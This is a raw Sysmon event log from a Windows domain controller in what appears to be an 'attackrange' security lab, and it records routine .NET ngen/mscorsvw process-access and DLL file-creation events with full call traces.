13:45:03.861{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90DF-6005-6301-00000000A301}4532C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:03.814{59A5CD1D-90DF-6005-6201-00000000A301}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\8b8-0\System.Xml.Linq.dll2021-01-18 13:45:03.814 10341000x80000000000000005589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:03.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90DF-6005-6201-00000000A301}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:03.486{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90DF-6005-6201-00000000A301}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:03.486{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90DF-6005-6201-00000000A301}2232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:03.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90DF-6005-6101-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:03.392{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90DF-6005-6101-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:03.392{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90DF-6005-6101-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:03.329{59A5CD1D-90DE-6005-6001-00000000A301}3232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\ca0-0\System.Net.Http.dll2021-01-18 13:45:03.329 10341000x80000000000000005604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:04.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90E0-6005-6601-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:04.923{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90E0-6005-6601-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:04.923{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90E0-6005-6601-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:04.892{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90E0-6005-6501-00000000A301}1408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:04.876{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90E0-6005-6501-00000000A301}1408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:04.876{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90E0-6005-6501-00000000A301}1408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:04.814{59A5CD1D-90E0-6005-6401-00000000A301}1244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\4dc-0\System.Runtime.WindowsRuntime.dll2021-01-18 13:45:04.814 10341000x80000000000000005597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:04.157{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90E0-6005-6401-00000000A301}1244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:04.142{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90E0-6005-6401-00000000A301}1244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:04.142{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90E0-6005-6401-00000000A301}1244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:05.157{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90E1-6005-6801-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000005610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:05.142{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90E1-6005-6801-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:05.142{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90E1-6005-6801-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:05.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90E1-6005-6701-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:05.064{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90E1-6005-6701-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:05.064{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90E1-6005-6701-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:05.001{59A5CD1D-90E0-6005-6601-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\f4c-0\System.Runtime.WindowsRuntime.UI.Xaml.dll2021-01-18 13:45:05.001 10341000x80000000000000005615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:45:07.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90E3-6005-6901-00000000A301}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:07.501{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90E3-6005-6901-00000000A301}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
